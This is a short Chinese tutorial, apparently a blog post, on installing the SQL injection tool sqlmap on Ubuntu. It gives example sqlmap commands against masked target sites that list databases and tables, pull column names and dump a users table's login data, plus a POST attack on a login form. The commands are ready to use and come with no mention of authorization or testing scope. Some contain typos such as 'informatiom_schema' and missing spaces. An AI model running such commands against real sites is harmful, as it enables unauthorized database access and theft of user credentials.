如何在ubantu上安装sqlmap

1,先安装git:sudo apt-get install git

2,然后从git克隆sqlmap:git clone git://github.com/sqlmapproject/sqlmap.git

3,最后使用:进入到sqlmap目录python sqlmap.py



1,试例之GET:

sqlmap -u http://www.****.com/index.php?id=18 --dbs(查看目标网站数据库)

sqlmap -u http://www.****.com/index.php?id=18 -D informatiom_schema --tables(获取数据库表)

python sqlmap.py -u http://www.****.com/index.php?id=18 -D information_schema -Tusers--columns(获取表的字段)

python sqlmap.py -uhttp://www.****.com/index.php?id=18 -D information_schema -T users -C u_login --dump(获取表的字段数据)


2,试例之POST:

sqlmap -uhttp://www.****.com/login --data"username=123456&password=9999&verify=EN5F"  -o --threads 8 --dbs

你可能感兴趣的:(网络安全)